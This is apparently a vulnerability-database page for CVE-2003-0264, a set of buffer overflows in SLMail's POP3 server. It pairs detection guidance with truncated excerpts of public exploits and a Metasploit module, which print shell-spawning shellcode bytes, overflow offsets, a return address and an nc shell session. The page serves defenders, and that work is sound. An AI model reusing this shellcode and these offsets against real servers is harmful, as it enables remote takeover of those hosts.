CVE-2003-0264
published 2003-05-27CVE-2003-0264: Multiple buffer overflows in SLMail 5.1.0.4420 allows remote attackers to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.48%
99.3th percentile
Multiple buffer overflows in SLMail 5.1.0.4420 allows remote attackers to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN argument to slmail.exe, (3) a long string to POPPASSWD, or (4) a long password to the POP3 server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| seattle_lab_software | slmail | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2
bytes↗
\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45
- →Detect oversized PASS command on POP3 port 110: buffer offset of 2606 or 4654 bytes before EIP overwrite; any PASS argument exceeding ~2600 bytes is malicious. ↗
- →Monitor POP3 (port 110) for PASS commands containing long runs of 0x41 ('A') padding followed by a return address and NOP sled (0x90) bytes — characteristic of this stack overflow exploit. ↗
- →Alert on POP3 PASS commands where the password field length exceeds 2600 bytes; the vulnerability is unauthenticated and triggers before any credential check. ↗
- →After exploitation, the POP3 port 110 becomes unusable until slmail.exe service is restarted — monitor for sudden POP3 service unavailability following a large PASS request. ↗
- →Detect known shellcode byte sequence at start of payload: FC 6A EB 4D E8 F9 FF FF FF 60 8B 6C 24 24 8B 45 (reverse shell / bind shell loader used across multiple exploits for this CVE). ↗
- →Monitor for outbound bind-shell connections on port 4444 from the SLMail server host following a large POP3 PASS request. ↗
- →Inspect for the Metasploit banner regex match failure pattern: POP3 banner must match /^\+OK POP3 server (.*) ready/ — anomalous banners may indicate a crashed/exploited service. ↗
- ·The return address 0x5f4a358f (from SLMFC.DLL) works across all Windows versions and service packs tested; defenders should not assume a specific OS version for this exploit. ↗
- ·Older versions of SLMail prior to 5.5 may also be vulnerable with the same exploit; testing was not performed on older versions. ↗
- ·Null bytes (0x00), newlines (0x0a, 0x0d), and spaces (0x20) are bad characters and cannot appear in the payload; shellcode must be encoded to avoid these bytes. ↗
- ·SLMFC.DLL last modification date is 06/02/99, suggesting the vulnerable code path has been unchanged for years and the DLL is a stable gadget source. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2003-0264 Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
---
##
# $Id: seattlelab_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
'Description' => %q{
There exists an unauthenticated buffer overflow vulnerability
in the POP3 server of Seattle Lab Mail 5.5 when sending a password
with excessive length.
Successful exploitation should not crash either the
service or the server; however, after initial use the
port cannot be reused for s
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)
exploitdb·2004-12-22
CVE-2003-0264 Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)
---
/*
SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
*/
#include
#include
#include
#include
// [*] bind 4444
unsigned char shellcode[] =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\x
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
exploitdb·2004-12-21
CVE-2003-0264 Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
#define port 110
/* revshell العراق القراصنة المجموعة*/
char shellcode[] =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)
exploitdb·2004-11-18
CVE-2003-0264 Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)
---
#########################################################
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# www.offsec.com #
# Plain vanilla stack overflow in the PASS command #
# #
#########################################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
#########################################################
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
#########################################################
import struct
import socket
print "\n\n######################
Metasploit
Seattle Lab Mail 5.5 POP3 Buffer Overflow
metasploit
Seattle Lab Mail 5.5 POP3 Buffer Overflow
Seattle Lab Mail 5.5 POP3 Buffer Overflow
There exists an unauthenticated buffer overflow vulnerability in the POP3 server of Seattle Lab Mail 5.5 when sending a password with excessive length. Successful exploitation should not crash either the service or the server; however, after initial use the port cannot be reused for successive exploitation until the service has been restarted. Consider using a command execution payload following the bind shell to restart the service if you need to reuse the same port. The overflow appears to occur in the debugging/error reporting section of the slmail.exe executable, and there are multiple offsets that will lead to successful exploitation. This exploit uses 2606, the offset that creates the smallest overall payload. The other offset is 4654. The r
http://marc.info/?l=bugtraq&m=105232506011335&w=2http://marc.info/?l=ntbugtraq&m=105233360321895&w=2http://packetstormsecurity.com/files/161526/SLMail-5.1.0.4420-Remote-Code-Execution.htmlhttp://www.nextgenss.com/advisories/slmail-vulns.txthttp://marc.info/?l=bugtraq&m=105232506011335&w=2http://marc.info/?l=ntbugtraq&m=105233360321895&w=2http://packetstormsecurity.com/files/161526/SLMail-5.1.0.4420-Remote-Code-Execution.htmlhttp://www.nextgenss.com/advisories/slmail-vulns.txt
2003-05-27
Published